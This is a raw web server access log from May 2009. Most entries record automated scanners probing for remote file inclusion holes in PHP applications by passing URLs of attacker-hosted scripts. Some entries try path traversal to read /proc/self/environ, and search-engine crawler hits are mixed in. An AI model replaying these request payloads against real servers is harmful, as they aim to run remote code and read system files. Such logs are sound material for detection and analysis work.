216.119.103.12 - - [27/May/2009:23:45:34 -0500] "GET /errors.php?error=http://www.rakkasanwarriors.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.119.103.12 - - [27/May/2009:23:45:38 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://www.rakkasanwarriors.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.119.103.12 - - [27/May/2009:23:46:05 -0500] "GET /logs/access_log.1230336000/errors.php?error=http://www.rakkasanwarriors.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.175.122.228 - - [27/May/2009:23:49:58 -0500] "GET //upgrade_album.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
66.175.122.228 - - [27/May/2009:23:49:58 -0500] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
66.175.122.228 - - [27/May/2009:23:49:58 -0500] "GET /logs/access_log.1239753600//upgrade_album.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
66.175.122.228 - - [27/May/2009:23:50:21 -0500] "GET /logs/access_log.1239494400//upgrade_album.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.38.16.54 - - [27/May/2009:23:52:38 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://chr.es.kr/02.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.826"
218.38.16.54 - - [27/May/2009:23:52:38 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://chr.es.kr/02.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.826"
218.38.16.54 - - [27/May/2009:23:52:51 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://chr.es.kr/02.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.826"
218.38.16.54 - - [27/May/2009:23:52:51 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://chr.es.kr/02.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.826"
88.191.103.144 - - [27/May/2009:23:53:16 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.103.144 - - [27/May/2009:23:53:16 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
88.191.103.144 - - [27/May/2009:23:53:16 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
88.191.103.144 - - [27/May/2009:23:53:16 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
81.92.97.90 - - [27/May/2009:23:58:35 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
81.92.97.90 - - [27/May/2009:23:58:35 -0500] "GET //ashnews.php?pathtoashnews=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
81.92.97.90 - - [27/May/2009:23:58:35 -0500] "GET /logs/access_log.1242086400//ashnews.php?pathtoashnews=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.92.97.90 - - [27/May/2009:23:59:10 -0500] "GET /logs/access_log.1242432000//ashnews.php?pathtoashnews=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
218.38.16.54 - - [28/May/2009:00:00:35 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://chr.es.kr/02.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.826"
218.38.16.54 - - [28/May/2009:00:00:36 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://chr.es.kr/02.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.826"
65.55.106.205 - - [28/May/2009:00:01:08 -0500] "GET /logs/access_log.1207008000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.182.143.50 - - [28/May/2009:00:04:22 -0500] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 353 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:00:04:22 -0500] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 348 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:00:04:23 -0500] "GET /logs/access_log.1239321600/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 375 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:00:04:26 -0500] "GET /logs/access_log.1239321600/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 375 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:00:04:26 -0500] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 348 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:00:04:27 -0500] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 353 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:00:05:39 -0500] "GET /logs/access_log.1242000000/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 375 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:00:06:03 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 351 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:00:06:03 -0500] "GET /logs/access_log.1242000000/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 378 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:00:06:03 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 356 "-""Mozilla/5.0"
81.92.97.90 - - [28/May/2009:00:06:07 -0500] "GET /logs/access_log.1241740800//ashnews.php?pathtoashnews=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:00:06:09 -0500] "GET /logs/access_log.1242518400/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 378 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:00:06:21 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 351 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:00:06:22 -0500] "GET /logs/access_log.1242000000/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 378 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:00:06:22 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 356 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:00:06:28 -0500] "GET /logs/access_log.1242518400/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 378 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:00:07:02 -0500] "GET /logs/access_log.1242000000/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 375 "-""Mozilla/5.0"
189.14.202.124 - - [28/May/2009:00:07:21 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
189.14.202.124 - - [28/May/2009:00:07:21 -0500] "GET //ashnews.php?pathtoashnews=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
189.14.202.124 - - [28/May/2009:00:07:21 -0500] "GET /logs/access_log.1242086400//ashnews.php?pathtoashnews=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
189.14.202.124 - - [28/May/2009:00:07:21 -0500] "GET /logs/access_log.1239667200//ashnews.php?pathtoashnews=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
65.55.106.189 - - [28/May/2009:00:11:09 -0500] "GET /logs/access_log.1222992000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
189.14.202.124 - - [28/May/2009:00:15:14 -0500] "GET /logs/access_log.1241740800//ashnews.php?pathtoashnews=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
62.149.163.198 - - [28/May/2009:00:17:13 -0500] "GET /db.php?path_local=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 289 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
62.149.163.198 - - [28/May/2009:00:17:13 -0500] "GET /logs/db.php?path_local=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
62.149.163.198 - - [28/May/2009:00:17:13 -0500] "GET /errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
62.149.163.198 - - [28/May/2009:00:17:13 -0500] "GET /logs/errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
62.149.163.198 - - [28/May/2009:00:17:14 -0500] "GET /db.php?path_local=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 289 "-""XXXXXX"
62.149.163.198 - - [28/May/2009:00:17:14 -0500] "GET /logs/db.php?path_local=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 294 "-""XXXXXX"
62.149.163.198 - - [28/May/2009:00:17:14 -0500] "GET /db.php?path_local=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""XXXXXX"
62.149.163.198 - - [28/May/2009:00:17:14 -0500] "GET /logs/db.php?path_local=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""XXXXXX"
218.1.64.133 - - [28/May/2009:00:19:41 -0500] "GET /logs//apboard/add.php?APB_rp=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 304 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
218.1.64.133 - - [28/May/2009:00:19:41 -0500] "GET //apboard/add.php?APB_rp=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
218.1.64.133 - - [28/May/2009:00:19:41 -0500] "GET /logs/errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
218.1.64.133 - - [28/May/2009:00:19:42 -0500] "GET /logs//apboard/add.php?APB_rp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 304 "-""XXXXXX"
218.1.64.133 - - [28/May/2009:00:19:42 -0500] "GET /errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
218.1.64.133 - - [28/May/2009:00:19:42 -0500] "GET /logs//apboard/add.php?APB_rp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""XXXXXX"
218.1.64.133 - - [28/May/2009:00:19:42 -0500] "GET //apboard/add.php?APB_rp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 299 "-""XXXXXX"
218.1.64.133 - - [28/May/2009:00:19:43 -0500] "GET //apboard/add.php?APB_rp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""XXXXXX"
80.237.248.146 - - [28/May/2009:00:22:12 -0500] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
80.237.248.146 - - [28/May/2009:00:22:12 -0500] "GET //pollphp/textfile//admin/common.inc.php?base_path=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
80.237.248.146 - - [28/May/2009:00:22:13 -0500] "GET /errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
80.237.248.146 - - [28/May/2009:00:22:13 -0500] "GET /logs/errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
80.237.248.146 - - [28/May/2009:00:22:13 -0500] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 327 "-""XXXXXX"
80.237.248.146 - - [28/May/2009:00:22:14 -0500] "GET //pollphp/textfile//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 322 "-""XXXXXX"
80.237.248.146 - - [28/May/2009:00:22:14 -0500] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""XXXXXX"
80.237.248.146 - - [28/May/2009:00:22:14 -0500] "GET //pollphp/textfile//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""XXXXXX"
65.55.106.110 - - [28/May/2009:00:22:39 -0500] "GET /logs/access_log.1153612800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.240 - - [28/May/2009:00:23:09 -0500] "GET /logs/access_log.1183075200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.65.36 - - [28/May/2009:00:24:16 -0500] "GET / HTTP/1.1" 200 3245 "-""DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
115.137.197.60 - - [28/May/2009:00:28:56 -0500] "GET /logs/armygame.php?libpath=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 300 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
115.137.197.60 - - [28/May/2009:00:28:56 -0500] "GET /armygame.php?libpath=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 295 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
115.137.197.60 - - [28/May/2009:00:28:57 -0500] "GET /logs/errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
115.137.197.60 - - [28/May/2009:00:28:57 -0500] "GET /errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
115.137.197.60 - - [28/May/2009:00:28:57 -0500] "GET /logs/armygame.php?libpath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 300 "-""XXXXXX"
115.137.197.60 - - [28/May/2009:00:28:58 -0500] "GET /armygame.php?libpath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 295 "-""XXXXXX"
115.137.197.60 - - [28/May/2009:00:28:58 -0500] "GET /logs/armygame.php?libpath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""XXXXXX"
115.137.197.60 - - [28/May/2009:00:28:58 -0500] "GET /armygame.php?libpath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""XXXXXX"
83.103.72.130 - - [28/May/2009:00:33:58 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
83.103.72.130 - - [28/May/2009:00:33:58 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
83.103.72.130 - - [28/May/2009:00:33:58 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
211.233.22.209 - - [28/May/2009:00:38:13 -0500] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
211.233.22.209 - - [28/May/2009:00:38:13 -0500] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
38.99.44.102 - - [28/May/2009:00:41:03 -0500] "GET /logs/access_log.1242000000 HTTP/1.0" 200 750296 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.249.65.36 - - [28/May/2009:00:42:37 -0500] "GET /logs/access_log.1242518400 HTTP/1.1" 200 507747 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.103.72.130 - - [28/May/2009:00:51:02 -0500] "GET /logs/access_log.1241481600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.38.243.71 - - [28/May/2009:00:51:19 -0500] "GET //components/com_virtuemart/imgtag.php?mosConfig_absolute_path=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.249.65.36 - - [28/May/2009:00:52:23 -0500] "GET /icons/folder.gif HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
89.108.64.88 - - [28/May/2009:00:53:43 -0500] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.tiller.ru/plp.txt? HTTP/1.1" 404 357 "-""libwww-perl/5.812"
89.108.64.88 - - [28/May/2009:00:53:43 -0500] "GET //administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.tiller.ru/plp.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.812"
76.12.124.76 - - [28/May/2009:00:54:35 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://finance-911.com/done/.log/id.txt?%0D?? HTTP/1.1" 404 345 "-""libwww-perl/5.825"
76.12.124.76 - - [28/May/2009:00:54:35 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://finance-911.com/done/.log/id.txt?%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.825"
76.12.124.76 - - [28/May/2009:00:54:51 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://finance-911.com/done/.log/id.txt?%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.825"
76.12.124.76 - - [28/May/2009:00:54:51 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://finance-911.com/done/.log/id.txt?%0D?? HTTP/1.1" 404 345 "-""libwww-perl/5.825"
76.12.124.76 - - [28/May/2009:00:55:06 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://finance-911.com/done/.log/id.txt?%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.825"
76.12.124.76 - - [28/May/2009:00:55:06 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://finance-911.com/done/.log/id.txt?%0D?? HTTP/1.1" 404 345 "-""libwww-perl/5.825"
76.12.124.76 - - [28/May/2009:00:55:26 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://finance-911.com/done/.log/id.txt?%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.825"
76.12.124.76 - - [28/May/2009:00:55:26 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://finance-911.com/done/.log/id.txt?%0D?? HTTP/1.1" 404 345 "-""libwww-perl/5.825"
76.12.124.76 - - [28/May/2009:00:55:30 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://finance-911.com/done/.log/id.txt?%0D?? HTTP/1.1" 404 345 "-""libwww-perl/5.825"
76.12.124.76 - - [28/May/2009:00:55:33 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://finance-911.com/done/.log/id.txt?%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.825"
216.17.99.13 - - [28/May/2009:00:55:34 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ks-bank.ru/yes.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.826"
216.17.99.13 - - [28/May/2009:00:55:34 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ks-bank.ru/yes.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.826"
76.12.124.76 - - [28/May/2009:00:55:41 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://finance-911.com/done/.log/id.txt?%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.825"
76.12.124.76 - - [28/May/2009:00:55:41 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://finance-911.com/done/.log/id.txt?%0D?? HTTP/1.1" 404 345 "-""libwww-perl/5.825"
91.195.124.9 - - [28/May/2009:01:03:39 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.radekoncar.ru///administrator/components/com_virtuemart/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.822"
91.195.124.9 - - [28/May/2009:01:03:39 -0500] "GET //appserv/main.php?appserv_root=http://www.radekoncar.ru///administrator/components/com_virtuemart/id.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.822"
211.233.22.209 - - [28/May/2009:01:04:15 -0500] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
211.233.22.209 - - [28/May/2009:01:04:16 -0500] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.109.102.96 - - [28/May/2009:01:05:15 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
210.109.102.96 - - [28/May/2009:01:05:15 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
210.109.102.96 - - [28/May/2009:01:05:15 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
210.109.102.96 - - [28/May/2009:01:05:49 -0500] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
220.181.7.97 - - [28/May/2009:01:07:31 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
216.120.237.150 - - [28/May/2009:01:08:01 -0500] "GET /logs/index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
216.120.237.150 - - [28/May/2009:01:08:02 -0500] "GET /index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
